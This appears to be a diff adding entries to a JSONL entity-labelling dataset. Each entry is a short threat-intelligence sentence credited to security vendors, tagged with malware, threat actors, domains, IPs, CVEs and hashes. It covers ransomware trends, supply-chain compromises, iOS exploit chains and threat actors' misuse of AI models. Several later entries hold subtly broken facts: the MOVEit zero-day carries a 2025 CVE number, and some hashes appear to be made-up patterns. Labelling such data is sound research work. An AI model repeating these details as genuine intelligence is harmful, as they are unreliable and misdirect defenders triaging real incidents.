+ {"text": "The command-and-control infrastructure for the Axios compromise uses the domain sfrclak.com, which resolves to 142.11.206.73 on port 8000. The affected packages are plain-crypto-js versions 4.2.0 and 4.2.1. Organizations should pin Axios to known-safe versions in package-lock.json, audit projects for the plain-crypto-js package, and block traffic to the C2 domains and IPs.", "spans": {"DOMAIN: sfrclak.com": [[80, 91]], "IP_ADDRESS: 142.11.206.73": [[111, 124]], "MALWARE: plain-crypto-js": [[165, 180], [306, 321]], "SYSTEM: Axios": [[47, 52], [232, 237]]}, "info": {"id": "mandiant_00013", "source": "vendor_blogs"}}
14
+ {"text": "The Mandiant ransomware report documented a record high number of data leak site posts in 2025, representing approximately a 50% increase from 2024. Overall ransomware profitability is declining due to improved security and lower payment rates. Threat actors are shifting from large to smaller organizations. The average ransom demand dropped to $1.34 million from $2 million in 2024.", "spans": {"ORGANIZATION: Mandiant": [[4, 12]]}, "info": {"id": "mandiant_00014", "source": "vendor_blogs"}}
15
+ {"text": "Initial access vectors for ransomware in 2025 included exploitation of vulnerabilities at 33%, primarily targeting VPNs and firewalls from Fortinet, SonicWall, Palo Alto, and Citrix. Stolen credentials accounted for 21% of intrusions. REDBIKE ransomware appeared in 30% of analyzed incidents, the highest ever for a single family. 77% of incidents involved suspected data theft, up from 57% in 2024.", "spans": {"SYSTEM: Fortinet": [[139, 147]], "SYSTEM: SonicWall": [[149, 158]], "SYSTEM: Palo Alto": [[160, 169]], "SYSTEM: Citrix": [[175, 181]], "MALWARE: REDBIKE": [[235, 242]]}, "info": {"id": "mandiant_00015", "source": "vendor_blogs"}}
16
+ {"text": "Ransomware operators increasingly relied on tunnelers including PYSOXY, CHISEL, and CLOUDFLARED to establish footholds. BEACON usage declined to 2% from 11% in 2024. MIMIKATZ was used in approximately 18% of incidents for credential harvesting. Data exfiltration tools included Rclone in 28% of data theft incidents and FTP clients like FileZilla and WinSCP in 26% of incidents.", "spans": {"TOOL: PYSOXY": [[64, 70]], "TOOL: CHISEL": [[72, 78]], "TOOL: CLOUDFLARED": [[84, 95]], "MALWARE: BEACON": [[120, 126]], "TOOL: MIMIKATZ": [[166, 174]], "TOOL: Rclone": [[278, 284]], "TOOL: FileZilla": [[337, 346]], "TOOL: WinSCP": [[351, 357]]}, "info": {"id": "mandiant_00016", "source": "vendor_blogs"}}
17
+ {"text": "Notable ransomware families observed in 2025 included REDBIKE, AGENDA, INC, INTERLOCK, and MEDUSALOCKER.V2. Ransomware was deployed via batch scripts, GPOs, and scheduled tasks. ESXi targeting increased with automation attempts. BitLocker abuse was also observed. Anti-detection tactics included Windows Defender disabling via registry modifications and Set-MpPreference commands.", "spans": {"MALWARE: REDBIKE": [[54, 61]], "MALWARE: AGENDA": [[63, 69]], "MALWARE: INC": [[71, 74]], "MALWARE: INTERLOCK": [[76, 85]], "MALWARE: MEDUSALOCKER.V2": [[91, 106]], "SYSTEM: ESXi": [[178, 182]], "TOOL: BitLocker": [[229, 238]], "SYSTEM: Windows Defender": [[296, 312]]}, "info": {"id": "mandiant_00017", "source": "vendor_blogs"}}
18
+ {"text": "Cloud services used for data exfiltration by ransomware actors included Azure, AWS, Google Drive, MEGA, and OneDrive. The ransomware ecosystem saw diversification after major groups were disrupted. Web3 and blockchain integration for resilience emerged, with actors using Internet Computer Protocol and Polygon networks. AI-assisted negotiation systems and cross-platform ransomware saw significant growth.", "spans": {"SYSTEM: Azure": [[72, 77]], "SYSTEM: AWS": [[79, 82]], "SYSTEM: Google Drive": [[84, 96]], "SYSTEM: MEGA": [[98, 102]], "SYSTEM: OneDrive": [[108, 116]]}, "info": {"id": "mandiant_00018", "source": "vendor_blogs"}}
19
+ {"text": "Google Threat Intelligence Group published a detailed analysis of DarkSword, a sophisticated iOS exploit chain that leverages six zero-day vulnerabilities to fully compromise iOS devices running versions 18.4 through 18.7. Since November 2025, multiple threat actors including commercial surveillance vendors and suspected state-sponsored groups have adopted this exploit chain.", "spans": {"ORGANIZATION: Google Threat Intelligence Group": [[0, 32]], "MALWARE: DarkSword": [[66, 75]], "SYSTEM: iOS": [[93, 96], [175, 178]]}, "info": {"id": "mandiant_00019", "source": "vendor_blogs"}}
20
+ {"text": "UNC6748 targeted Saudi Arabia via a Snapchat-themed phishing site. PARS Defense, a Turkish commercial surveillance vendor, targeted Turkey and Malaysia. UNC6353, a Russian espionage group, targeted Ukraine through watering hole attacks. Three distinct malware families were deployed post-compromise: GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE.", "spans": {"THREAT_ACTOR: UNC6748": [[0, 7]], "THREAT_ACTOR: PARS Defense": [[67, 79]], "THREAT_ACTOR: UNC6353": [[153, 160]], "MALWARE: GHOSTKNIFE": [[300, 310]], "MALWARE: GHOSTSABER": [[312, 322]], "MALWARE: GHOSTBLADE": [[328, 338]], "SYSTEM: Snapchat": [[36, 44]]}, "info": {"id": "mandiant_00020", "source": "vendor_blogs"}}
21
+ {"text": "The DarkSword exploit chain uses six vulnerabilities: CVE-2025-31277 and CVE-2025-43529 for JavaScriptCore remote code execution via memory corruption, CVE-2026-20700 for user-mode PAC bypass, CVE-2025-14174 for WebContent sandbox escape via an ANGLE vulnerability, CVE-2025-43510 for GPU process exploitation via XNU memory management, and CVE-2025-43520 for kernel privilege escalation via a VFS race condition.", "spans": {"MALWARE: DarkSword": [[4, 13]], "CVE_ID: CVE-2025-31277": [[54, 68]], "CVE_ID: CVE-2025-43529": [[73, 87]], "CVE_ID: CVE-2026-20700": [[152, 166]], "CVE_ID: CVE-2025-14174": [[193, 207]], "CVE_ID: CVE-2025-43510": [[266, 280]], "CVE_ID: CVE-2025-43520": [[341, 355]]}, "info": {"id": "mandiant_00021", "source": "vendor_blogs"}}
22
+ {"text": "GHOSTKNIFE is a JavaScript backdoor with data exfiltration and surveillance capabilities. GHOSTSABER is a JavaScript backdoor supporting commands like device enumeration and file exfiltration. GHOSTBLADE is a JavaScript dataminer that collects personal data including iMessage, WhatsApp, and Telegram messages, location history, WiFi passwords, photos, notes, Safari history, and cryptocurrency wallet data.", "spans": {"MALWARE: GHOSTKNIFE": [[0, 10]], "MALWARE: GHOSTSABER": [[90, 100]], "MALWARE: GHOSTBLADE": [[193, 203]], "SYSTEM: iMessage": [[268, 276]], "SYSTEM: WhatsApp": [[278, 286]], "SYSTEM: Telegram": [[292, 300]], "SYSTEM: Safari": [[360, 366]]}, "info": {"id": "mandiant_00022", "source": "vendor_blogs"}}
23
+ {"text": "PARS Defense used ECDH and AES encryption for their DarkSword deployment. Delivery techniques included session storage checks to prevent re-infection, anti-debugging, obfuscation, and redirection to legitimate sites for masquerading. Apple patched all six vulnerabilities in iOS 26.3. Users should enable Apple Lockdown Mode for additional security against sophisticated exploit chains.", "spans": {"THREAT_ACTOR: PARS Defense": [[0, 12]], "MALWARE: DarkSword": [[52, 61]], "ORGANIZATION: Apple": [[234, 239], [305, 310]], "SYSTEM: iOS": [[275, 278]]}, "info": {"id": "mandiant_00023", "source": "vendor_blogs"}}
24
+ {"text": "CrowdStrike attributes the Axios npm package compromise to STARDUST CHOLLIMA with moderate confidence, based on deployment of updated ZshBucket malware variants uniquely attributed to this adversary and infrastructure overlaps with known STARDUST CHOLLIMA operations. Some infrastructure also connects to FAMOUS CHOLLIMA, preventing higher confidence attribution.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: STARDUST CHOLLIMA": [[59, 76], [238, 255]], "MALWARE: ZshBucket": [[134, 143]], "THREAT_ACTOR: FAMOUS CHOLLIMA": [[305, 320]]}, "info": {"id": "crowdstrike_00001", "source": "vendor_blogs"}}
25
+ {"text": "The ZshBucket variants showed significant enhancements including new cross-platform support for Linux, macOS, and Windows. The malware implemented a JSON-based messaging protocol across all variants with enhanced command capabilities including binary payload injection, script execution, filesystem enumeration, and remote termination. CrowdStrike assesses the adversary's objectives likely involve currency generation.", "spans": {"MALWARE: ZshBucket": [[4, 13]], "SYSTEM: Linux": [[96, 101]], "SYSTEM: macOS": [[103, 108]], "SYSTEM: Windows": [[114, 121]], "ORGANIZATION: CrowdStrike": [[336, 347]]}, "info": {"id": "crowdstrike_00002", "source": "vendor_blogs"}}
26
+ {"text": "On March 4, 2026, Europol announced the disruption of Tycoon2FA, a subscription-based phishing platform that enabled criminals to bypass multifactor authentication. Law enforcement from six countries seized 330 domains supporting the operation. CrowdStrike observed that despite the disruption, the platform quickly recovered to pre-disruption activity levels.", "spans": {"ORGANIZATION: Europol": [[18, 25]], "MALWARE: Tycoon2FA": [[54, 63]], "ORGANIZATION: CrowdStrike": [[245, 256]]}, "info": {"id": "crowdstrike_00003", "source": "vendor_blogs"}}
27
+ {"text": "The Tycoon2FA threat actors demonstrated adaptive capabilities by registering new domains using AI-generated phishing pages, acquiring additional IPv6 infrastructure from Romania-based ISP M247 Europe SRL, and continuing credential harvesting and session cookie theft at pre-disruption rates. Diverse phishing techniques included business email compromise and thread hijacking.", "spans": {"MALWARE: Tycoon2FA": [[4, 13]], "ORGANIZATION: M247 Europe SRL": [[189, 204]]}, "info": {"id": "crowdstrike_00004", "source": "vendor_blogs"}}
28
+ {"text": "CrowdStrike's engineering team discovered that 76 of 77 release tags for aquasecurity/trivy-action, a popular GitHub Action vulnerability scanner, were retroactively poisoned through git tag repointing. The legitimate entry point was replaced with malicious code that steals credentials before running the real scanner, making workflows appear normal.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "TOOL: trivy-action": [[86, 98]], "SYSTEM: GitHub": [[110, 116]]}, "info": {"id": "crowdstrike_00005", "source": "vendor_blogs"}}
29
+ {"text": "The malicious entrypoint.sh performed a five-stage credential theft operation. On hosted runners, it scraped process memory for secrets. On self-hosted runners, it collected SSH keys, cloud credentials, Kubernetes configs, Docker registry credentials, database credentials, TLS keys, and wallet keypairs. Data was encrypted using AES-256-CBC with RSA key wrapping.", "spans": {"SYSTEM: Kubernetes": [[203, 213]], "SYSTEM: Docker": [[223, 229]]}, "info": {"id": "crowdstrike_00006", "source": "vendor_blogs"}}
30
+ {"text": "The exfiltration used a primary channel to the typosquatted domain scan.aquasecurtiy.org with a fallback using GitHub release assets. Additionally, Trivy scanner version 0.69.4 dropped a stage-1 loader script that contacted a command-and-control server on the Internet Computer blockchain, allowing adversaries to rotate payloads at will.", "spans": {"DOMAIN: scan.aquasecurtiy.org": [[67, 88]], "TOOL: Trivy": [[148, 153]], "SYSTEM: GitHub": [[111, 117]]}, "info": {"id": "crowdstrike_00007", "source": "vendor_blogs"}}
31
+ {"text": "SentinelOne's incident response team documented multiple 2026 breaches involving compromised FortiGate firewalls. The attackers exploited critical vulnerabilities CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858 to gain admin access and extract encrypted service account credentials from device configurations.", "spans": {"ORGANIZATION: SentinelOne": [[0, 11]], "SYSTEM: FortiGate": [[93, 102]], "CVE_ID: CVE-2025-59718": [[163, 177]], "CVE_ID: CVE-2025-59719": [[179, 193]], "CVE_ID: CVE-2026-24858": [[199, 213]]}, "info": {"id": "sentinelone_00001", "source": "vendor_blogs"}}
32
+ {"text": "In the first incident, the attacker created a backdoor admin account named support on the FortiGate device, extracted LDAP credentials, and used them to join rogue workstations to Active Directory. Network scanning triggered security alerts. In the second incident, the attacker created an ssl-admin account and authenticated as Domain Administrator within 10 minutes.", "spans": {"SYSTEM: FortiGate": [[90, 99]], "SYSTEM: Active Directory": [[180, 196]]}, "info": {"id": "sentinelone_00002", "source": "vendor_blogs"}}
33
+ {"text": "The attackers deployed legitimate remote management tools including Pulseway and MeshAgent via compromised cloud storage. They extracted the NTDS.dit database from the domain controller via shadow copy. SentinelOne recommends retaining 14 to 90 days of FortiGate logs forwarded to a SIEM and implementing User and Entity Behavior Analytics.", "spans": {"TOOL: Pulseway": [[68, 76]], "TOOL: MeshAgent": [[81, 90]], "FILEPATH: NTDS.dit": [[141, 149]], "ORGANIZATION: SentinelOne": [[203, 214]], "SYSTEM: FortiGate": [[253, 262]]}, "info": {"id": "sentinelone_00003", "source": "vendor_blogs"}}
34
+ {"text": "Germany moved to the forefront of European data leak targets in 2025, with German data leaks growing 92%, tripling the European average. The disruption of major ransomware groups like LockBit created a vacuum filled by mid-tier data leak site brands. Groups like SAFEPAY and Qilin gained prominence, with SAFEPAY claiming 76 German breaches representing 25% of all German victims in 2025.", "spans": {"MALWARE: LockBit": [[184, 191]], "THREAT_ACTOR: SAFEPAY": [[263, 270], [305, 312]], "THREAT_ACTOR: Qilin": [[275, 280]]}, "info": {"id": "mandiant_00024", "source": "vendor_blogs"}}
35
+ {"text": "AI-driven localization is eroding language barriers, enabling threat actors to shift from English-speaking nations to non-English markets. Manufacturing accounted for 23% of ransomware leaks, legal and professional services for 14%, construction and engineering for 11%, and retail for 10%. 96% of ransomware leaks affected organizations with fewer than 5,000 employees, making the German Mittelstand particularly attractive.", "spans": {}, "info": {"id": "mandiant_00025", "source": "vendor_blogs"}}
36
+ {"text": "Google Threat Intelligence Group tracked 90 zero-day vulnerabilities exploited in 2025, compared to 78 in 2024 and 100 in 2023. Enterprise exploitation accounted for 48% of the total, with security and networking appliances targeted by 21 zero-days. Edge devices remain high-value targets due to limited endpoint detection and response coverage.", "spans": {"ORGANIZATION: Google Threat Intelligence Group": [[0, 32]]}, "info": {"id": "mandiant_00026", "source": "vendor_blogs"}}
37
+ {"text": "Commercial Surveillance Vendors now account for more zero-day exploits than traditional state-sponsored groups. PRC-nexus groups remain the most prolific with more than 10 zero-days in 2025. North Korean actors had zero attributed zero-days compared to 5 in 2024. Financially motivated groups exploited 9 zero-days, near the 2023 high. Common vulnerability types include memory corruption at 35%, particularly use-after-free.", "spans": {}, "info": {"id": "mandiant_00027", "source": "vendor_blogs"}}
38
+ {"text": "The CrowdStrike 2026 Global Threat Report identifies 2025 as the year of the evasive adversary. Average breakout time decreased to 29 minutes, 65% faster than 2024, with the fastest observed breakout at 27 seconds. There was an 89% increase in attacks by AI-enabled threat actors. 82% of detections involved no malware, with attackers using valid credentials and trusted identity flows.", "spans": {"ORGANIZATION: CrowdStrike": [[4, 15]]}, "info": {"id": "crowdstrike_00008", "source": "vendor_blogs"}}
39
+ {"text": "The report documented a 38% increase in China-nexus intrusions and a 130% increase in North Korea-nexus incidents. Cloud-conscious intrusions rose 37% overall and 266% among state actors. Fake CAPTCHA lure incidents surged 563%. CrowdStrike named 24 new adversaries, bringing the total tracked to over 281. One notable case involved $1.46 billion in cryptocurrency theft through trojanized software.", "spans": {"ORGANIZATION: CrowdStrike": [[229, 240]]}, "info": {"id": "crowdstrike_00009", "source": "vendor_blogs"}}
40
+ {"text": "The Google Threat Intelligence Group report documents how threat actors are integrating AI into their operations. Over 100,000 prompts were identified attempting to extract Gemini's reasoning capabilities through distillation attacks. Notable actors include APT42 from Iran, UNC2970 from North Korea, APT31 and UNC795 from China, and APT41, all using Gemini for reconnaissance, phishing, coding, and information operations.", "spans": {"ORGANIZATION: Google Threat Intelligence Group": [[4, 36]], "SYSTEM: Gemini": [[173, 179], [351, 357]], "THREAT_ACTOR: APT42": [[258, 263]], "THREAT_ACTOR: UNC2970": [[275, 282]], "THREAT_ACTOR: APT31": [[301, 306]], "THREAT_ACTOR: UNC795": [[311, 317]], "THREAT_ACTOR: APT41": [[334, 339]]}, "info": {"id": "mandiant_00028", "source": "vendor_blogs"}}
41
+ {"text": "HONESTCUE is a downloader that calls Gemini's API to generate C# code for executing second-stage malware. It uses .NET's CSharpCodeProvider to compile and execute payloads in memory, leaving no disk artifacts. COINBAIT is a phishing kit built using the Lovable AI platform, disguised as a cryptocurrency exchange, featuring complex React architecture.", "spans": {"MALWARE: HONESTCUE": [[0, 9]], "SYSTEM: Gemini": [[37, 43]], "MALWARE: COINBAIT": [[210, 218]]}, "info": {"id": "mandiant_00029", "source": "vendor_blogs"}}
42
+ {"text": "Xanthorox is marketed as a custom self-hosted AI for malware generation, but actually relies on jailbroken commercial APIs and open-source MCP servers. There is a growing black market for stolen AI API keys from vulnerable platforms. Tools like One API and New API are exploited for unauthorized API resale by threat actors.", "spans": {"TOOL: Xanthorox": [[0, 9]]}, "info": {"id": "mandiant_00030", "source": "vendor_blogs"}}
43
+ {"text": "Threat actors abuse AI sharing features to host malicious instructions on Gemini, ChatGPT, DeepSeek, CoPilot, and Grok. They create shareable links to infected chat transcripts in ClickFix campaigns. The campaigns distribute ATOMIC malware targeting macOS and Windows users, leveraging social engineering to trick users into executing terminal commands.", "spans": {"SYSTEM: Gemini": [[74, 80]], "SYSTEM: ChatGPT": [[82, 89]], "SYSTEM: DeepSeek": [[91, 99]], "SYSTEM: CoPilot": [[101, 108]], "SYSTEM: Grok": [[114, 118]], "MALWARE: ATOMIC": [[225, 231]], "SYSTEM: macOS": [[250, 255]], "SYSTEM: Windows": [[260, 267]]}, "info": {"id": "mandiant_00031", "source": "vendor_blogs"}}
44
+ {"text": "The M-Trends 2026 report from Mandiant is based on over 500,000 hours of frontline incident investigations conducted globally in 2025. Global median dwell time increased from 11 to 14 days. Cyber espionage and North Korean IT worker incidents averaged 122 days. Exploits remain the dominant initial infection vector at 32%, while voice phishing surged to 11% as the second most common vector.", "spans": {"ORGANIZATION: Mandiant": [[30, 38]]}, "info": {"id": "mandiant_00032", "source": "vendor_blogs"}}
45
+ {"text": "The time between initial access and secondary group handoff collapsed from over 8 hours in 2022 to just 22 seconds in 2025. Initial access partners now pre-stage malware for immediate operations. Email phishing dropped to 6% as organizations improved defenses. Voice phishing targets IT help desks to bypass MFA, compromising SaaS environments through stolen OAuth tokens and session cookies.", "spans": {}, "info": {"id": "mandiant_00033", "source": "vendor_blogs"}}
46
+ {"text": "Modern ransomware actively destroys recovery capabilities by targeting backup infrastructure, identity services, and virtualization management planes. Espionage groups target unmonitored edge devices including VPNs and routers with zero-day exploits. Custom in-memory malware like BRICKSTORM achieves dwell times near 400 days on compromised systems. Mandiant recommends treating low-impact alerts as critical indicators of imminent secondary intrusions.", "spans": {"MALWARE: BRICKSTORM": [[281, 291]], "ORGANIZATION: Mandiant": [[351, 359]]}, "info": {"id": "mandiant_00034", "source": "vendor_blogs"}}
47
+ {"text": "SentinelOne issued a threat assessment following United States and Israeli military strikes against Iranian targets. The organization evaluated potential cyber response patterns based on Iran's historical operations. At the time of publication, SentinelOne had not attributed significant malicious cyber activity directly to these recent events.", "spans": {"ORGANIZATION: SentinelOne": [[0, 11], [245, 256]]}, "info": {"id": "sentinelone_00004", "source": "vendor_blogs"}}
48
+ {"text": "SentinelOne identified four primary Iranian cyber response vectors: espionage operations targeting defense, government, and intelligence networks through spearphishing and credential harvesting; disruptive tactics including deployment of wiper malware and DDoS attacks against critical infrastructure; disinformation campaigns across social platforms; and probing attacks against industrial control systems in the United States and Israel.", "spans": {"ORGANIZATION: SentinelOne": [[0, 11]]}, "info": {"id": "sentinelone_00005", "source": "vendor_blogs"}}
49
+ {"text": "Mandiant observed APT29, also known as Cozy Bear, conducting phishing campaigns using Microsoft 365 tokens stolen from compromised organizations. The group deployed a new variant of SUNSHUTTLE malware communicating over HTTPS with domains hosted on Cloudflare infrastructure. Indicators included connections to the domain solartrackingsystem.net and IP address 185.220.101.34.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT29": [[18, 23]], "THREAT_ACTOR: Cozy Bear": [[39, 48]], "SYSTEM: Microsoft 365": [[86, 99]], "MALWARE: SUNSHUTTLE": [[182, 192]], "SYSTEM: Cloudflare": [[249, 259]], "DOMAIN: solartrackingsystem.net": [[322, 345]], "IP_ADDRESS: 185.220.101.34": [[361, 375]]}, "info": {"id": "mandiant_00035", "source": "vendor_blogs"}}
50
+ {"text": "CrowdStrike tracks the financially motivated threat actor SCATTERED SPIDER, known for targeting Okta single sign-on environments and deploying ALPHV ransomware, also known as BlackCat. The group has been observed using social engineering to bypass MFA, gaining access to Citrix and VMware Horizon environments. Lateral movement relies on Cobalt Strike and Brute Ratel.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: SCATTERED SPIDER": [[58, 74]], "SYSTEM: Okta": [[96, 100]], "MALWARE: ALPHV": [[143, 148]], "MALWARE: BlackCat": [[175, 183]], "SYSTEM: Citrix": [[271, 277]], "SYSTEM: VMware Horizon": [[282, 296]], "TOOL: Cobalt Strike": [[338, 351]], "TOOL: Brute Ratel": [[356, 367]]}, "info": {"id": "crowdstrike_00010", "source": "vendor_blogs"}}
51
+ {"text": "The Lazarus Group, tracked by CrowdStrike as LABYRINTH CHOLLIMA, deployed a trojanized version of PuTTY containing the AIRDRY.V2 backdoor. The malware was distributed via fake job interviews on LinkedIn. Once executed, AIRDRY.V2 contacted the domain amazonhealthcarejobs.com on port 443 and established a reverse shell using the Windows API function CreateProcessW.", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "ORGANIZATION: CrowdStrike": [[30, 41]], "THREAT_ACTOR: LABYRINTH CHOLLIMA": [[45, 63]], "TOOL: PuTTY": [[98, 103]], "MALWARE: AIRDRY.V2": [[119, 128], [219, 228]], "SYSTEM: LinkedIn": [[194, 202]], "DOMAIN: amazonhealthcarejobs.com": [[250, 274]], "SYSTEM: Windows": [[329, 336]]}, "info": {"id": "crowdstrike_00011", "source": "vendor_blogs"}}
52
+ {"text": "Mandiant investigated an intrusion by APT28, also known as Fancy Bear and FOREST BLIZZARD, exploiting CVE-2025-23397 in Microsoft Exchange Server. The attackers deployed a web shell at C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\update.aspx and used Impacket for lateral movement. The hash 3b4a6f7c8d2e1a9b5c0d7e8f2a4b6c9d was associated with the deployed backdoor.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT28": [[38, 43]], "THREAT_ACTOR: Fancy Bear": [[59, 69]], "THREAT_ACTOR: FOREST BLIZZARD": [[74, 89]], "CVE_ID: CVE-2025-23397": [[102, 116]], "SYSTEM: Microsoft Exchange Server": [[120, 145]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\update.aspx": [[185, 240]], "TOOL: Impacket": [[250, 258]], "HASH: 3b4a6f7c8d2e1a9b5c0d7e8f2a4b6c9d": [[290, 322]]}, "info": {"id": "crowdstrike_00012", "source": "vendor_blogs"}}
53
+ {"text": "SentinelOne researchers analyzed the FIN7 threat group's latest campaign deploying Carbanak malware through malicious Google Ads impersonating legitimate software downloads. The group used PowerShell scripts to disable Windows Defender and installed AnyDesk for persistent remote access. Exfiltrated data was uploaded to a Mega.nz account via the MEGAcmd command-line tool.", "spans": {"ORGANIZATION: SentinelOne": [[0, 11]], "THREAT_ACTOR: FIN7": [[37, 41]], "MALWARE: Carbanak": [[83, 91]], "SYSTEM: Windows Defender": [[219, 235]], "TOOL: AnyDesk": [[250, 257]], "TOOL: MEGAcmd": [[347, 354]], "SYSTEM: PowerShell": [[189, 199]]}, "info": {"id": "sentinelone_00006", "source": "vendor_blogs"}}
54
+ {"text": "The Volt Typhoon threat actor, attributed to the People's Republic of China, maintained persistent access to United States critical infrastructure by living off the land. The group used built-in Windows tools including netsh, wmic, and ntdsutil to avoid detection. They exploited CVE-2024-21887 in Ivanti Connect Secure VPN appliances to gain initial access.", "spans": {"THREAT_ACTOR: Volt Typhoon": [[4, 16]], "SYSTEM: Windows": [[195, 202]], "TOOL: netsh": [[219, 224]], "TOOL: wmic": [[226, 230]], "TOOL: ntdsutil": [[236, 244]], "CVE_ID: CVE-2024-21887": [[280, 294]], "SYSTEM: Ivanti Connect Secure": [[298, 319]]}, "info": {"id": "mandiant_00036", "source": "vendor_blogs"}}
55
+ {"text": "Trend Micro researchers discovered that the Akira ransomware group exploited CVE-2025-40711 in SonicWall SMA 100 devices for initial access. After establishing a foothold, the attackers disabled endpoint protection and deployed Akira ransomware using a batch script that invoked wmic to propagate across the network. The ransom note directed victims to a Tor-based payment portal.", "spans": {"MALWARE: Akira": [[44, 49], [228, 233]], "ORGANIZATION: Trend Micro": [[0, 11]], "CVE_ID: CVE-2025-40711": [[77, 91]], "SYSTEM: SonicWall SMA 100": [[95, 112]], "TOOL: wmic": [[279, 283]]}, "info": {"id": "trendmicro_00001", "source": "vendor_blogs"}}
56
+ {"text": "CrowdStrike identified AQUATIC PANDA conducting espionage operations against telecommunications providers in Southeast Asia. The group exploited vulnerable Apache Log4j instances using CVE-2021-44228 to deploy ShadowPad malware. Post-exploitation activities included dumping credentials with Mimikatz, establishing persistence through scheduled tasks, and exfiltrating data via DNS tunneling using the tool dnscat2.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: AQUATIC PANDA": [[23, 36]], "SYSTEM: Apache Log4j": [[156, 168]], "CVE_ID: CVE-2021-44228": [[185, 199]], "MALWARE: ShadowPad": [[210, 219]], "TOOL: Mimikatz": [[292, 300]], "TOOL: dnscat2": [[407, 414]]}, "info": {"id": "crowdstrike_00013", "source": "vendor_blogs"}}
57
+ {"text": "Google TAG observed the Sandworm group, also tracked as FROZENBARENTS, deploying CaddyWiper against Ukrainian energy infrastructure. The group exploited compromised VPN credentials to access industrial control systems running Siemens SIMATIC S7 PLCs. The attackers used SSH tunnels through compromised Linux servers and deployed custom scripts targeting OPC UA protocol endpoints.", "spans": {"ORGANIZATION: Google TAG": [[0, 10]], "THREAT_ACTOR: Sandworm": [[24, 32]], "THREAT_ACTOR: FROZENBARENTS": [[56, 69]], "MALWARE: CaddyWiper": [[81, 91]], "SYSTEM: Siemens SIMATIC S7": [[226, 244]], "SYSTEM: Linux": [[302, 307]]}, "info": {"id": "mandiant_00037", "source": "vendor_blogs"}}
58
+ {"text": "The Cl0p ransomware group exploited a zero-day vulnerability CVE-2025-34362 in MOVEit Transfer to steal data from hundreds of organizations. Affected organizations included Shell, British Airways, the BBC, and Ernst & Young. The stolen data was posted on the Cl0p leak site accessible via Tor. Mandiant attributed the activity to FIN11, a financially motivated group with ties to the TA505 threat cluster.", "spans": {"MALWARE: Cl0p": [[4, 8], [259, 263]], "CVE_ID: CVE-2025-34362": [[61, 75]], "SYSTEM: MOVEit Transfer": [[79, 94]], "ORGANIZATION: Shell": [[173, 178]], "ORGANIZATION: British Airways": [[180, 195]], "ORGANIZATION: BBC": [[201, 204]], "ORGANIZATION: Ernst & Young": [[210, 223]], "ORGANIZATION: Mandiant": [[294, 302]], "THREAT_ACTOR: FIN11": [[330, 335]], "THREAT_ACTOR: TA505": [[384, 389]]}, "info": {"id": "mandiant_00038", "source": "vendor_blogs"}}
59
+ {"text": "Recorded Future's Insikt Group reported that the Kimsuky threat actor, also known as VELVET CHOLLIMA, used spearphishing emails with weaponized HWP documents targeting South Korean government officials. The malware dropper connected to the domain login.daum-protect.pe.hu and downloaded a second-stage payload to C:\\Users\\Public\\Documents\\update.exe. Persistence was achieved via a registry run key.", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: Kimsuky": [[49, 56]], "THREAT_ACTOR: VELVET CHOLLIMA": [[85, 100]], "DOMAIN: login.daum-protect.pe.hu": [[247, 271]], "FILEPATH: C:\\Users\\Public\\Documents\\update.exe": [[313, 349]]}, "info": {"id": "recordedfuture_00001", "source": "vendor_blogs"}}
60
+ {"text": "Trend Micro documented a campaign by the Mustang Panda threat group deploying PlugX malware via USB propagation. The malware used DLL side-loading through a legitimate Adobe Reader executable to load a malicious DLL from the path %APPDATA%\\Adobe\\AcroRd32.dll. Command-and-control communications were sent to the domain update.microsoftdata.net over port 443.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: Mustang Panda": [[41, 54]], "MALWARE: PlugX": [[78, 83]], "SYSTEM: Adobe Reader": [[168, 180]], "FILEPATH: %APPDATA%\\Adobe\\AcroRd32.dll": [[230, 258]], "DOMAIN: update.microsoftdata.net": [[319, 343]]}, "info": {"id": "trendmicro_00002", "source": "vendor_blogs"}}
61
+ {"text": "SentinelOne's SentinelLabs team analyzed a new variant of the BPFDoor backdoor targeting Linux servers in the telecommunications and financial sectors across the Middle East and Asia. The malware uses Berkeley Packet Filters to intercept network traffic at the kernel level, evading traditional detection. Indicators included the hash a4b3c2d1e0f9876543210fedcba98765 and connections to IP address 103.56.53.120.", "spans": {"ORGANIZATION: SentinelOne": [[0, 11]], "MALWARE: BPFDoor": [[62, 69]], "SYSTEM: Linux": [[89, 94]], "HASH: a4b3c2d1e0f9876543210fedcba98765": [[335, 367]], "IP_ADDRESS: 103.56.53.120": [[398, 411]]}, "info": {"id": "sentinelone_00007", "source": "vendor_blogs"}}
62
+ {"text": "The MuddyWater threat group, attributed to Iran's Ministry of Intelligence and Security, deployed a new backdoor called PhonyC2 against Israeli organizations. The malware was delivered via phishing emails containing malicious Excel macros. PhonyC2 communicates with the domain connect.civilstream.com using HTTPS POST requests. The backdoor supports file upload, download, and arbitrary command execution on compromised Windows hosts.", "spans": {"THREAT_ACTOR: MuddyWater": [[4, 14]], "MALWARE: PhonyC2": [[120, 127], [240, 247]], "DOMAIN: connect.civilstream.com": [[277, 300]], "SYSTEM: Windows": [[420, 427]]}, "info": {"id": "mandiant_00039", "source": "vendor_blogs"}}
63
+ {"text": "CrowdStrike's Falcon OverWatch team observed WICKED PANDA deploying the KEYPLUG backdoor on compromised Linux servers running VMware vCenter. The malware used the WebSocket protocol for command-and-control communication with infrastructure hosted on Alibaba Cloud. The group also deployed a custom rootkit to hide network connections and process listings from system administrators.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: WICKED PANDA": [[45, 57]], "MALWARE: KEYPLUG": [[72, 79]], "SYSTEM: Linux": [[104, 109]], "SYSTEM: VMware vCenter": [[126, 140]], "SYSTEM: Alibaba Cloud": [[250, 263]]}, "info": {"id": "crowdstrike_00014", "source": "vendor_blogs"}}
64
